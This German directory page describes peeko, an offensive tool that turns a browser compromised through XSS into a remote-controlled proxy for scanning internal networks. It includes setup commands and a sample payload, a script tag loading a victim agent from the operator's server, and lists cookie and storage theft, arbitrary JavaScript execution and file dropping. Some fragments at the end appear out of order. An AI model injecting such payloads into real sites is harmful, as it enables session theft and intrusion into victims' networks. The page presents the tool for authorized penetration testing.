Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
peeko — peeko – Browser-basiertes XSS-C2 für heimliche Erkundung interner Netzwerke über einen infizierten Browser. | Kitploit
Tools/GitHubGitHub/b3rito/peeko
AufklärungNetzwerkkartierungPort-ScanningLaterale BewegungWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and Control
GitHubb3rito/peeko
230286vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

peeko

peeko – Browser-basiertes XSS-C2 für heimliche Erkundung interner Netzwerke über einen infizierten Browser.

Repository anzeigen
Teilen

peeko

Version: v1.1

peeko ist ein browserbasiertes XSS-gestütztes C2-Tool (Command and Control), das den Browser des Opfers als heimlichen Proxy in internen Netzwerken nutzt.

Über eine injizierte XSS-Payload stellt peeko eine WebSocket-Verbindung zu einem zentralen Server her, wodurch ein Angreifer den Browser des Opfers fernsteuern kann, um Anfragen an interne Dienste zu senden, Netzwerke zu scannen, Daten zu exfiltrieren oder sogar beliebiges JavaScript auszuführen – ganz ohne eine einzige Binärdatei abzulegen.


Funktionen

  • WebSocket-basierte Kommunikation zwischen Angreifer und Opfern
  • Der Browser des Opfers ruft interne URLs ab und scannt IP-Bereiche + Ports
  • Einfaches Bedienfeld mit:
    • Opferauswahl
    • Manueller URL-Abruf
    • IP- und Portbereich-Scanner
    • Benutzerdefinierte JS-Ausführung (manuell oder automatisch)
    • Dateiübermittlung (automatisch/manuell)
    • Browser-Info- und Token-Sammlung (Cookies, Storage usw.)
    • Log-Viewer mit Kopieren/Speichern als .txt oder .json
  • HTTPS-Unterstützung mit selbstsignierten Zertifikaten
  • Leichtgewichtig: eine einzelne Python-Datei + statische Assets

Voraussetzungen

  • Python 3.8+
  • OpenSSL
  • Linux/macOS (getestet auf Debian-basierten Systemen)

Schnellstart

  1. Repository klonen:

    root@kitploit:~
    git clone https://github.com/b3rito/peeko.git
    cd peeko
    
  2. Abhängigkeiten installieren:

    root@kitploit:~
    make install
    
  3. (Optional) Skripte ausführbar machen:

    root@kitploit:~
    chmod +x gen-cert.sh start.sh
    
  4. Selbstsigniertes TLS-Zertifikat erzeugen:

    root@kitploit:~
    make cert
    
  5. Den Platzhalter SERVER-IP ersetzen:

    Die folgenden Dateien öffnen und bearbeiten:

    • static/agent.js
    • static/control.html

    SERVER-IP durch die IP/den Domainnamen deines Servers ersetzen:

    root@kitploit:~
    wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
    
  6. Server starten:

    root@kitploit:~
    make run
    
  7. Das Bedienfeld im Browser öffnen:


Funktionen des Bedienfelds

Kernfunktionen

  • Verbundene Opfer auswählen und verwalten
  • Beliebige interne/externe HTTPS-URL über das Opfer abrufen
  • LAN-Bereiche scannen: 192.168.1.0/24, 10.0.0.10-20 usw.
  • Bestimmte Ports oder Bereiche scannen (z. B. 80, 443,8000-8080)

Dateiübermittlung

  • Dateien an das Opfer senden (Base64 über WebSocket)
  • Der Browser des Opfers lädt sie automatisch herunter
  • Unterstützt automatischen Upload bei Verbindungsaufbau

Informationssammlung

  • User Agent, Plattform, Referrer, Cookies, local/sessionStorage sammeln
  • Ergebnisse im JSON-Format anzeigen
  • Manuell auslösbar oder automatisch bei Verbindungsaufbau

Benutzerdefinierte JS-Ausführung

  • Beliebiges JavaScript im Browser des Opfers ausführen
  • Format exec:... zum Senden verwenden
  • Unterstützt Auto-Run bei Verbindungsaufbau
  • Beispiel: exec:alert(document.cookie);

Protokollierung

  • Alles wird protokolliert (Anfragen, Antworten, Info-Dumps)
  • Protokolle als .txt oder .json kopieren oder exportieren
  • Minimalistische, wie ein Terminal-Log gestaltete Benutzeroberfläche

CORS & Mixed Content erklärt

Moderne Browserrichtlinien beeinflussen, worauf peeko zugreifen kann.

CORS-Antworten

HeaderInhalt lesbar?Hinweise
Access-Control-Allow-Origin: *✅Voller Zugriff auf die Antwort
Kein Header⚠️Antwort ist undurchsichtig

Mixed Content

Das Opfer verbindet sich über HTTPS. Wenn ein gescanntes Ziel nur HTTP verwendet:

  • Der Browser blockiert Mixed-Content-Anfragen
  • peeko kann nicht von http://-Endpunkten lesen
  • Beim Scannen immer HTTPS-Ziele bevorzugen

In der Praxis

Wenn du während eines Penetrationstests einen internen Dienst findest, der mit Access-Control-Allow-Origin: * antwortet und über HTTPS ausgeliefert wird, wird peeko zu einem heimlichen Proxy, der interne Daten direkt aus dem Browser des Opfers exfiltrieren kann – ohne Dateien abzulegen oder ausgehende Verbindungen zu öffnen.


Projektstruktur

root@kitploit:~
peeko/
├── main.py             → FastAPI WebSocket server  
├── start.sh            → Launch server  
├── gen-cert.sh         → Generate self-signed TLS certificate  
├── Makefile            → Install/run helpers  
├── requirements.txt    → Python dependencies  
├── certs/              → TLS key and cert will be stored here  
└── static/             → Browser client assets  
    ├── control.html    → Control panel (was attacker.html)  
    ├── infect.html     → Victim landing page  
    └── agent.js        → Victim agent script  

Arbeitsablauf

  1. Angreifer injiziert XSS (über gespeicherte oder reflektierte Schwachstelle)
  2. Der Browser des Opfers verbindet sich per WebSocket mit dem peeko-Server
  3. Das Bedienfeld erlaubt dem Angreifer:
    • Netzwerk scannen
    • URLs abrufen
    • Cookies und Storage auslesen
    • Beliebigen JS ausführen
    • Antworten exfiltrieren
    • Dateien ablegen

Anwendungsfälle

  • Interne Netzwerkkartierung per XSS
  • Browserbasiertes Pivoting
  • Lautlose Dateiübermittlung / JS-Dropper

Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und autorisierten Testzwecken.
Jede Verwendung von peeko außerhalb von Umgebungen, in denen du ausdrückliche Genehmigung hast, ist strikt untersagt.
Du bist für deine eigenen Handlungen verantwortlich.


Autoren

Geschrieben von b3rito bei mes3hacklab & GioPpeTto

Tool herunterladen
root@kitploit:~
https://192.168.30.136:8443/static/control.html
  • Den Agenten injizieren (Beispiel-XSS):

    root@kitploit:~
    <script src="https://192.168.30.136:8443/static/agent.js"></script>
    
  • Eingeschränkte Origin❌Blockiert oder nicht lesbar